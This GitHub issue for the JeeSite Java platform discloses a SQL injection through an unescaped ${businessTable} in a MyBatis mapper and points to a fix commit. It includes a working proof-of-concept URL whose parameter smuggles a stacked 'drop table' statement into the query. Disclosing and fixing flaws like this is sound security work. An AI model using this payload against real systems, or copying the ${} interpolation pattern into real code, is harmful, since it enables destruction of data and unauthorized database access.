search

thinkgem / jeesite

Java rapid development platform, based (Spring Boot, Spring MVC, Apache Shiro, MyBatis, Beetl, Bootstrap, AdminLTE), online code generation, including modules: Organization, role users, menu and button authorization, data permissions, system parameters, content management, workflow, etc. Loose coupling design is adopted; one key skin switch; account security Settings, password policies; Online scheduled task configuration; Support cluster, support SAAS; Support for multiple data sources
http://jeesite.com
Apache License 2.0
8k stars 5.66k forks source link

mybatis tablename sql injection #515

Closed BACMiao closed 1 year ago

BACMiao commented 1 year ago

sql mappings

以下的${businessTable}存在SQL注入的风险

src/main/resources/mappings/modules/act/ActDao.xml
<mapper namespace="com.thinkgem.jeesite.modules.act.dao.ActDao">

    <update id="updateProcInsIdByBusinessId">
        UPDATE ${businessTable} SET 
            proc_ins_id = #{procInsId}
        WHERE id = #{businessId}
    </update>

</mapper>

RequestMapping

com.thinkgem.jeesite.modules.act.web.ActTaskController 类中的 start 方法

image-20230516154826781

Call Stack

image-20230516154624692

SQL Inject

当用户为jdbc.url添加&allowMultiQueries=true并启动程序后,此时Spring允许批量更新,就能进行SQL注入了

image-20230516154115876

测试表为aa表

image-20230516153725737

任意用户执行以下url,

url: http://localhost:8080/jeesite/a/act/task/start?procDefKey=test_audit&title=dd&businessTable=79&businessId=oa_test_audit%20set%20proc_ins_id%20=%20%271%27%20where%20id=%2779%27;drop%20table%20aa;--

Mybatis将SQL进行拼接并删去aa表

image-20230516153844650

再次执行上述url时,此时已经不存在aa数据表

image-20230516153929226

查看mysql,发现aa表已经被删除

image-20230516153902090
heshaojin commented 1 year ago

这是来自QQ邮箱的假期自动回复邮件。你好,我最近正在休假中,无法亲自回复你的邮件。我将在假期结束后,尽快给你回复。

think-gem commented 1 year ago

https://github.com/thinkgem/jeesite/commit/30750011b49f7c8d45d0f3ab13ed3a1a422655bb